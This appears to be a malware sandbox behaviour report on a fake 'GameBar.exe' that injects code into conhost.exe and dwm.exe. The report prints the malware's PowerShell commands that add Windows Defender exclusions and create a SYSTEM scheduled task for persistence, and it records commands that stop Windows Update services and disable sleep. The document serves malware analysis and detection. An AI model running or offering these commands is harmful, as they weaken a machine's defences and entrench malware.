Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Code function: 46_2_00007FF67EEC1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,

46_2_00007FF67EEC1180

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Section loaded: C:\Windows\Temp\drwozmpbokky.tmp target: C:\Windows\System32\conhost.exe protection: readonly			Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Section loaded: C:\Windows\Temp\drwozmpbokky.tmp target: C:\Windows\System32\dwm.exe protection: readonly			Jump to behavior

Writes to foreign memory regions

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Memory written: C:\Windows\System32\conhost.exe base: 9E1BEE4010			Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Memory written: C:\Windows\System32\dwm.exe base: 57BCA44010			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Thread register set: target process: 3680			Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Thread register set: target process: 7664			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\GameBar.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#cgwzt#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gamebar' /tr '''c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gamebar' -user 'system' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#cgwzt#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gamebar' /tr '''c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gamebar' -user 'system' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lmcqiiob#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gamebar' /tr '''c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gamebar' -user 'system' -runlevel 'highest' -force; }
Source: C:\Users\user\Desktop\GameBar.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#cgwzt#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gamebar' /tr '''c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gamebar' -user 'system' -runlevel 'highest' -force; }	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#cgwzt#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gamebar' /tr '''c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gamebar' -user 'system' -runlevel 'highest' -force; }	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lmcqiiob#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'gamebar' /tr '''c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\windowsapsss\microsoftxboxgamingoverlays\gamebar.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'gamebar' -user 'system' -runlevel 'highest' -force; }	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
